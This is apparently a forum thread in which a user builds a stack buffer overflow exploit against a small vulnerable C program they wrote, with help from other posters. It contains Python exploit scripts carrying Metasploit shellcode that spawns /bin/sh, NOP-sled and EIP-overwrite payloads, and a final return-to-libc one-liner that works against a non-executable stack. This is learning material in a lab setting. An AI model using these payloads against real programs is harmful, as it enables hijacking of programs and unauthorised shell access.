Help with a buffer overflow example

[gkhnoisgtht]

I have a simple program in c that I would like to exploit:

Code: Select all

int main(int argc, char ** argv[])
{
   if(argc > 2)
   {
       fillbuffer(argv[1]);
   }
}

void fillbuffer(char *buf[])
{
   char weakbuff[512];
   strcpy(weakbuf, buf);
}


so far I have written the following code in python to exploit the above program

Code: Select all

#!/usr/bin/python
import os, sys, subprocess

# test buffer to see how many char I need to get a segfault
#buffer = "\x43" * 520

init = "\x90" * 200
pad = "\x43" * 133
eip = "\x45\x46\x47\x48"
end_pad = "\x44" * 9

# shell to launch /bin/sh 191 bytes
shellcode = (#unsigned char buf[] =
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x2d\x6e\x65\x20\x27"
"\x5c\x78\x36\x61\x5c\x78\x30\x62\x5c\x78\x35\x38\x5c\x78\x39"
"\x39\x5c\x78\x35\x32\x5c\x78\x36\x36\x5c\x78\x36\x38\x5c\x78"
"\x32\x64\x5c\x78\x36\x33\x5c\x78\x38\x39\x5c\x78\x65\x37\x5c"
"\x78\x36\x38\x5c\x78\x32\x66\x5c\x78\x37\x33\x5c\x78\x36\x38"
"\x5c\x78\x30\x30\x5c\x78\x36\x38\x5c\x78\x32\x66\x5c\x78\x36"
"\x32\x5c\x78\x36\x39\x5c\x78\x36\x65\x5c\x78\x38\x39\x5c\x78"
"\x65\x33\x5c\x78\x35\x32\x5c\x78\x65\x38\x5c\x78\x30\x38\x5c"
"\x78\x30\x30\x5c\x78\x30\x30\x5c\x78\x30\x30\x5c\x78\x32\x66"
"\x5c\x78\x36\x32\x5c\x78\x36\x39\x5c\x78\x36\x65\x5c\x78\x32"
"\x66\x5c\x78\x37\x33\x5c\x78\x36\x38\x5c\x78\x30\x30\x5c\x78"
"\x35\x37\x5c\x78\x35\x33\x5c\x78\x38\x39\x5c\x78\x65\x31\x5c"
"\x78\x63\x64\x5c\x78\x38\x30\x27\x7c\x73\x68")

crash = init + shellcode + pad + eip + end_pad

#program to exploit
function = "/home/sploited/Desktop/vuln "
os.system(function + crash)



my problem is when I try to run the code it appears as if the c program is actually executing the shellcode as it fills the buffer.

when I run the python program I get the message:

sh: 1: shCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCEFGHDDDDDDDDD: not found

when I look at the python program through GDB with set follow-fork-mode child, I see that a /bin/sh shell is spawned, generates the error above, and closes.

Is there any reason why the shellcode would be executed before I have the eip jump onto the nop slide? I am generating the payload with metasploit. I am trying to get a local root shell on the box so I am using the linux/x86/exec payload with the CMD = /bin/sh. I have tried several different encoders, all of which result in errors unless I use the cmd/generic_sh. The machine is a Debian 6 box and a ubuntu 12 box.

any help would be greatly appreciated.

Thanks in advance.

-- Tue Oct 01, 2013 11:53 pm --

Code: Select all

#!/usr/bin/python
import os, struct

init = "\x90" * 321
pad = "\x43" * 133
#08064e21
eip = "\x21\x4e\x06\x08"
end_pad = "\x44" * 0

shellcode = (#unsigned char buf[] =
"\xba\xc2\xdd\xe1\xd7\xda\xd9\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x0b\x31\x56\x15\x83\xee\xfc\x03\x56\x11\xe2\x37\xb7" +
"\xea\x8f\x2e\x1a\x8b\x47\x7d\xf8\xda\x7f\x15\xd1\xaf\x17" +
"\xe5\x45\x7f\x8a\x8c\xfb\xf6\xa9\x1c\xec\x01\x2e\xa0\xec" +
"\x3e\x4c\xc9\x82\x6f\xe3\x61\x5b\x27\x50\xf8\xba\x0a\xd6" )

crash = init + shellcode + pad + eip + end_pad

env = {"":shellcode}

function = "/home/sploited/Desktop/vuln"
os.execve(function,[function, crash], env)

I have updated the code. It now states that is has a segmentation fault during runtime on the target machine (Debian 6 and ubuntu 12) but it seems to run fine on backtrack.

[Goatboy]

I'm wondering why you need 191 bytes to spawn a local shell o.O

[gkhnoisgtht]

poor encoding mostly. I was also lazy and had my shell generated for me rather than writing my own by using msfpayload linux/x86/exec CMD=/bin/sh. I realize there are much smaller shells I could have used.

I discovered that the box has non executable stack enabled which was killing my program as soon as the shell started. I tried making a ROP of the same program but just can't seem to get it to work correctly.

Code: Select all

./vuln `perl -e 'printf "A" x 524 . "\x80\xf1\xec\xb7AAAA\xdf\xb0\xfb\xb7";'`


with the first 4 byte address being the start of the program. the 4 A's are overwriting the EIP and then the /bin/sh is the last 4 bytes. I found the /bin/sh address in gdb using find system, +999999999, "/bin/sh", though when I run x/s 0xb7fbb0df in gdb and I don't see /bin/sh as the output. I could also put the exit of the program into the ROP where EIP is overwritten but the address is 0xb7ec5300 and the nul byte gets removed from the perl string and core dumps the program.

[centip3de]

A few things to remember:

1. Always turn of ASLR. Unless you're really lucky, you're not going to hit your NOP sled with it on.

2. Make sure to allow stack execution in GCC.

3. Do lots of testing in GDB. Run the program with 50 (less or more, adjusted for the length of the buffer) A's, and 4 B's. If the EIP contains BBBB (in hex) at the end of it, then you're right on the money.

4. Before taking it out to the real world, run it all in GDB first. Being able to set breakpoints and view the stack frames is AMAZINGLY helpful when messing with shell-code. Once you get a shell spawned in GDB, you should be able to get a shell spawned in the real world fairly easily.

5. Remember that the addresses shown to you in GDB and in a real world test differ slightly. You may have to adjust the length of your NOP sled and mess with it a bit before it works.

6. Try, try, try again!

7. If you need any help, you can find me here or in #coffeesh0p in IRC.

[Goatboy]

Also, look into Hacking: The Art of Exploitation. I just finished reading it for like the fifth time for the lulz. Pretty good, if a bit dated.

[gkhnoisgtht]

Thanks for the suggestions. The issue I was having was the non executable stack. Sadly, I am trying to get back into the swing of things for my job.

Also great suggestion for Hacking The Art of Exploitation. I thankfully have the second edition and quickly reacquainted myself with his work on bypassing the non executable stack. I was able to exploit the program in no time after that. Thank you both for the suggestions.

the final result for those that are interested

Code: Select all

./vuln $(perl -e 'print "ABCD" x 131 . "\x80\xd1\x05\x40FAKE\x65\xff\xff\xbf"')